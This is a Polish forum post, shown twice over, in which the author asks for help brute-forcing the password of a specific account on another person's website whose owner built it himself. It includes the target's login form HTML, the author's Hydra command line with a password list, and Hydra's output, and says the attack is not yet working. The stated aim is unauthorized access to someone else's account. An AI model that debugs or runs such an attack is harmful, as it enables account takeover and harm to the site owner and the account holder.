Witam
Na poczatek napisze ze nie jestem specem w zakresie http i absolutnie sie nie znam na php/java/sql.
Czytalem od kilku godzin o atakach bruteforce, chodzi o logniecie sie na pewne konto na forum za posrednictwem maila oraz hasla. Maila znam, probowalem byle jakie haslo jakies 30 razy w ciagu minuty czy dwoch i nie ma zadnej blokady po kilku nieudanych probach-ta strona jest bardzo prosta wiec nie spodziewalbym sie zeby byla az tak zabezpieczone-wiem ze wlasciciel strony napisal ja sam od zera.
1) Pobralem program Hydra (http://sectools.org/tool/hydra/)-spec w sprawach bruteforce'a.
2) Inspektowanie elementow loginowych strony na ktora sie chce wlamac daje:
(...)
<script type="text/javascript">
function funcSignIn() {
var passObj = document.getElementById("passwordId");
var formObj = document.getElementById("formId");
var shaObj = new jsSHA(passObj.value, "TEXT");
if (passObj.value.length != 128)
{ passObj.value = shaObj.getHash("SHA-512", "HEX"); }
formObj.submit();
}
</script>
<div style="text-align:center;">
<div id="NestedMaster_ContentBody_FormLabel">
<form id="formId" action="signin" method="post">
<div id="NestedMaster_ContentBody_SignInError" class="signinerror"></div><br />
Email Address: <input type="text" name="emailaddress" /><br /><br />
Password: <input type="password" id="passwordId" name="password" /><br /><br />
<input type="button" value="Sign In" onclick="funcSignIn()" />
</form>
</div>
</div>
(...)
3) Znajac login i posiadajac plik z haslami "pass.txt" probuje szczescia:
dyn1218-175:x$ hydra -l poprawny@mail.tutaj -P pass.txt <stronka>.com http-get-form "/signin:emailadress=^USER^&password=^PASS^:Invalid"
4) Dostaje cos takiego:
[DATA] max 10 tasks per 1 server, overall 64 tasks, 10 login tries (l:2/p:5), ~0 tries per task
[DATA] attacking service http-get-form on port 80
No i ile bym nie czekal to nie dziala. Rowniez mam konto na tej stronie i probowalem ze swoim loginem oraz z plikiem tekstowym z piecioma haslami, jedno z ktorych jest poprawne.
Podejrzewam ze brak wiedzy z zakresu Java/php tutaj efektuje. Przegladac tutoriale, nigdy nie widzialem nic z java.
Prosilbym kogos ze znajomoscia HYDRY o pomoc.
3mcie sie
Na poczatek napisze ze nie jestem specem w zakresie http i absolutnie sie nie znam na php/java/sql.
Czytalem od kilku godzin o atakach bruteforce, chodzi o logniecie sie na pewne konto na forum za posrednictwem maila oraz hasla. Maila znam, probowalem byle jakie haslo jakies 30 razy w ciagu minuty czy dwoch i nie ma zadnej blokady po kilku nieudanych probach-ta strona jest bardzo prosta wiec nie spodziewalbym sie zeby byla az tak zabezpieczone-wiem ze wlasciciel strony napisal ja sam od zera.
1) Pobralem program Hydra (http://sectools.org/tool/hydra/)-spec w sprawach bruteforce'a.
2) Inspektowanie elementow loginowych strony na ktora sie chce wlamac daje:
(...)
<script type="text/javascript">
function funcSignIn() {
var passObj = document.getElementById("passwordId");
var formObj = document.getElementById("formId");
var shaObj = new jsSHA(passObj.value, "TEXT");
if (passObj.value.length != 128)
{ passObj.value = shaObj.getHash("SHA-512", "HEX"); }
formObj.submit();
}
</script>
<div style="text-align:center;">
<div id="NestedMaster_ContentBody_FormLabel">
<form id="formId" action="signin" method="post">
<div id="NestedMaster_ContentBody_SignInError" class="signinerror"></div><br />
Email Address: <input type="text" name="emailaddress" /><br /><br />
Password: <input type="password" id="passwordId" name="password" /><br /><br />
<input type="button" value="Sign In" onclick="funcSignIn()" />
</form>
</div>
</div>
(...)
3) Znajac login i posiadajac plik z haslami "pass.txt" probuje szczescia:
dyn1218-175:x$ hydra -l poprawny@mail.tutaj -P pass.txt <stronka>.com http-get-form "/signin:emailadress=^USER^&password=^PASS^:Invalid"
4) Dostaje cos takiego:
[DATA] max 10 tasks per 1 server, overall 64 tasks, 10 login tries (l:2/p:5), ~0 tries per task
[DATA] attacking service http-get-form on port 80
No i ile bym nie czekal to nie dziala. Rowniez mam konto na tej stronie i probowalem ze swoim loginem oraz z plikiem tekstowym z piecioma haslami, jedno z ktorych jest poprawne.
Podejrzewam ze brak wiedzy z zakresu Java/php tutaj efektuje. Przegladac tutoriale, nigdy nie widzialem nic z java.
Prosilbym kogos ze znajomoscia HYDRY o pomoc.
3mcie sie